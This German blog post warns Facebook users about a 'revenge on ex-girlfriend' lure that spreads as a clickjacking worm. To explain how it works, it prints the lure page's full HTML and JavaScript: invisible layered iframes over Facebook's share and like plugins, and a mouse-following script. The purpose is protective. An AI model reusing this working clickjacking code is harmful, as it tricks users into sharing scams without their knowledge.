Vorsicht mit den Interessanten

Sowas sehe ich immer häufiger bei Facebook. Ha – klingt interessant, wie?
Das ist allerdings ein Wurm, der sich über Facebook verbreitet. Mal drauf geklickt…

Bäm! Fieser Typ, aha, der Rächer – und was hat er nun mit seiner Exfreundin gemacht?! Der aktuelle Reiter heißt Revenge, das fällt einem gar nicht mehr auf, also mal auf „Click Here To Start“ geklickt.

Oh, noch keine Rache – dafür so eine Überprüfung, ob man wirklich ein Mensch ist, jaaaa Mann, das kenne ich von diversen Passwortabfragen und Download-Seiten und so, okeeeeehhh… ich bin doch ein Mensch.

Wenn man aber hier jetzt klickt, löst man aber bereits die zweite Falle aus.

Die erste war schon der gefälschte Link „Click Here To Start“. Das war nämlich kein echter Link, sondern ein verstecktes Script, welches den Inhalt der Seite gegen etwas neues austauscht. Internetbrowser und Facebook sind meistens so sicher, dass sie so etwas nicht von alleine starten, aber sie können nicht verhindern, dass der Benutzer darauf klickt. Grundmechanismen im Internet funktionieren so und das ist auch gut so, aber wenn so wie hier etwas verlockendes versprochen wird, dann ist das äußerst übel.

Das ist also gar kein echter Link, sondern der Startbefehl für ein kleines Programm, welches in der Facebookseite versteckt ist. Das selber macht nicht viel, das weiß Facebook zu verhindern. Aber Facebook kann nicht verhindern, dass das Script auf „Wunsch“ des Benutzers von woanders Sachen nachlädt.

Und diese Sachen sehen dann so aus:

<iframe id=“app4949752878_l“ src=“ht tp://blablubb.tk/p.php“ style=“border-top-width: 0px; border-right-width: 0px; border-bottom-width: 0px; border-left-width: 0px; border-style: initial; border-color: initial; height: 540px; width: 540px; „></iframe>

Da wird tatsächlich eine kleine Webseite in die Facebook-Webseite reingeladen. Und zwar nicht von Facebook.com oder .de selber sondern von (hier) blablubb.tk (ich habe den echten Link entfernt). Die Style-Angaben bedeuten nur, dass da Rahmen und Scrollbalken und so etwas versteckt wird, damit nicht auffällt, dass dieser kleine Bereich gar nicht mehr von Facebook stammt.

Die Seite, die dann nachgeladen wird, sieht in etwa so aus:

<body> <div style=“z-index:1; filter:alpha(opacity=0); -moz-opacity:0.0; -khtml-opacity: 0.0;opacity: 0.0; position: absolute; left: 120px; top: 180px; background-color: red; width: 150px; padding: 5px; color: white; border: 0px;“> <iframe scrolling=“no“ frameborder=“0″ name=“lpcframe“ id=“lpcframe“ allowtransparency=“true“ style=“border: medium none; overflow: hidden; width: 300px; height: 123px;“ src=„http://www.facebook.com/plugins/likebox.php?id=146683505374481&amp;width=600&amp;connections=10&amp;stream=true&amp;header=true&amp;height=587″></iframe> </div> <script> var myHTMLBody=(document.compatMode==“CSS1Compat“)? document.documentElement : document.body; var lpcLikeFrame = document.getElementById(‚lpcLikeFrame‘); var myBoolean = 0; function mouseFollower(e){ if (window.event) { lpcLikeFrame.style.top = (window.event.y-10)+myHTMLBody.scrollTop+’px‘; lpcLikeFrame.style.left = (window.event.x-10)+myHTMLBody.scrollLeft+’px‘; } else {lpcLikeFrame.style.top = (e.pageY-10)+’px‘; lpcLikeFrame.style.left = (e.pageX-10)+’px‘;} } document.onmousemove = function(e) { if (myBoolean == 0) {mouseFollower(e);} else lpcLikeFrame.style.display = ’none‘; } </script> <!— loading SHARE url —> <!— ADD YOUR OWN PAGE URL BELOW —> <div style=“z-index:100; filter:alpha(opacity=0); -moz-opacity:0.0; -khtml-opacity: 0.0;opacity: 0.0; position: absolute; left: -180px; top: -18px; background-color: blue; width: 370px; height:300px; padding: 0px; border: 0px;“> <iframe style=“width:100%; height:300px; border:none“ scrolling=“no“ src=“http://www.facebook.com/sharer.php?u=http://www.facebook.com/pages/OMG-This-GUY-Went-A-Little-To-Far-WITH-His-Revenge-On-His-EX-Girlfriend/146683505374481″></iframe> </div> <!— top big layer green button —> <div style=“z-index:101; filter:alpha(opacity=0); -moz-opacity:0.0; -khtml-opacity: 0.0;opacity: 0.0; position: absolute; left: 0px; top: 0px; background-color: green; width: 370px; height:245px; padding: 0px; border: 0px;“></div> <!— before share yellow —> <div style=“z-index:101; filter:alpha(opacity=0); -moz-opacity:0.0; -khtml-opacity: 0.0;opacity: 0.0; position: absolute; left: 0px; top: 245px; background-color: yellow; width: 79px; height:50px; padding: 0px; border: 0px;“></div> <!— before share for design purpose —> <div style=“z-index:101; position: absolute; left: 30px; top: 245px; background-color: #444444; width: 50px; height:25px; padding: 0px; border: 0px;“></div> <!— before share green bottom full —> <div style=“z-index:101; filter:alpha(opacity=0); -moz-opacity:0.0; -khtml-opacity: 0.0;opacity: 0.0; position: absolute; left: 0px; top: 270px; background-color: green; width: 350px; height:50px; padding: 0px; border: 0px;“></div> <!— after share to hide cancel —> <div style=“z-index:101; position: absolute; left: 130px; top: 245px; background-color: #FFC400; width: 60px; height:25px; padding: 0px; border: 0px;“></div> <!— after like second —> <div style=“z-index:101; position: absolute; left: 295px; top: 245px; background-color: green; width: 60px; height:25px; padding: 0px; border: 0px;“></div> <!— after like first —> <div style=“z-index:101; position: absolute; left: 235px; top: 245px; background-color: #7A3DB8; width: 60px; height:25px; padding: 0px; border: 0px;“></div> <!— SHARE button Blue —> <div style=“z-index:-101; position: absolute; left: 79px; top: 245px; background-color: red; width: 60px; height:25px; padding: 0px; border: 0px;“></div> <!— Like Button Blue —> <div style=“z-index:-101; position: absolute; left: 190px; top: 245px; background-color: blue; width: 45px; height:25px; padding: 0px; border: 0px;“></div> <!– <img src=“http://i48.tinypic.com/309t1u9.jpg“ border=0″> —> <img style=“margin-left:15px;“ src=“http://i49.tinypic.com/15q6gza.jpg“ border=“0″> </body>

Ich habe mal ein paar Sachen im Code markiert.
Opacitys – gaaanz, gaaaanz viele verschiedene, damit auch alle verschiedenen Browser kontrolliert werden können. Und alle auf „0“ oder „0.0“ gesetzt. Opacity ist „Sichtbarkeit“ und mit „0“ ist das gewünschte Element einfach unsichtbar. Es werden also einige Elemente wieder versteckt.
Facebook-URLs wie sharer.php und likebox.php – gepaart mit Javascript-Code und alle innerhalb der mittels Opacity versteckten Elemente. Hmmm… warum Facebook-Seiten verstecken?
ADD
YOUR OWN PAGE URL BELOW
– Oh, der Code stammt noch nicht mal von dem Arschloch selber, sondern den hat er sich auch nur irgendwo her kopiert und dann die Anleitung im Text befolgt.
Alles darunter ist nur Scheincode, der die bunten Felder darstellt, die machen gar nix. Aber darüber liegen die versteckten Facebookseiten und bei einem Klick auf die bunten Klötze klickt man tatsächlich auf die Facebook-Buttons. Auf Gefällt mir beispielsweise. Und dann sehen deine Freunde, dass dir das gefällt und klicken selber drauf.

So verbreitet sich der Wurm dann.

Diese bestimmte Seite gerade dient vermutlich nur dazu, dir Werbung zu zeigen, aber es kann auch sehr gut sein, dass über die versteckten Fenster Viren oder so etwas auf deinen PC geladen werden.

Also: NICHT EINFACH ÜBERALL DRAUF KLICKEN!!!

Eine Möglichkeit, wie man überprüfen kann, ob das Verarsche ist: einfach mal auf die „Wall“ des tollen Produkts klicken.

Da beschwert sich jemand. Vor 11 Sekunden. Die Beschwerden werden aber ständig gelöscht, man kann minütlich nachgucken und die Einträge auf der Wall sehen anders aus.

2 Antworten auf „Vorsicht mit den Interessanten“

Schreibe einen Kommentar

Deine E-Mail-Adresse wird nicht veröffentlicht. Erforderliche Felder sind mit * markiert.